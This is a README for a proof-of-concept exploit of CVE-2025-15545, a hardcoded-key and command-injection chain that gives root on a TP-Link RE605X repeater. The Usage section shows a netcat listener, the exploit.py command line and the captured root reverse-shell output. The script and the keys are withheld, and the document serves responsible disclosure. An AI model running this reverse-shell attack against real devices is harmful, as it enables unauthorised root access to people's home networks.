# CVE-2025-15545

## Information

**Vendor:** TP-Link </br>
**Vendor's website:** [TP-Link](https://www.tp-link.com) </br>
**Model:** Archer RE605X </br>
**Hardware version:** RE605X v3.0 </br>
**Firmware version:** RE605X(EU)_V3_1.1.5 Build 20240905 </br>
**Firmware download address:** [TP-Link](https://www.tp-link.com/en/support/download/re605x/v3/#Firmware)


A chain of vulnerabilities — including the use of hardcoded cryptographic keys and a command injection in the XML configuration parser component — allows a local authenticated attacker to achieve remote code execution (RCE) as root on the device.

## PoC Requirements

**Note:** The `exploit.py` proof-of-concept demonstrates a chained attack scenario and relies on credentials from an authenticated user as an additional prerequisite. This authentication step is not covered by CVE-2025-15545 and is included for demonstration purposes only.

- Both the attacker and the victim must be connected to the repeater’s local network.
- The victim must be authenticated to the repeater’s web control panel.


## Usage

Listen for incoming connections on a separate terminal:

```console
$ nc -lvnp 4444
```
</br>

Execute the `exploit.py` script:

```console
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>
```
*Note: `aes_key` and `aes_iv` are the hardcoded cryptographic keys used for configuration files encryption and decryption by the device, and are required for this proof of concept. For security issues they cannot be shared here.*
</br>

The reverse shell is received on the first terminal:

```console
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt
```

## References

These vulnerabilities were reported by Nicola Giuffrida.
- Complete Writeup: https://nico-security.com/posts/cve-2025-15545
- CVE Record: https://www.cve.org/cverecord?id=CVE-2025-15545
- TP-Link Advisory: https://www.tp-link.com/us/support/faq/4929
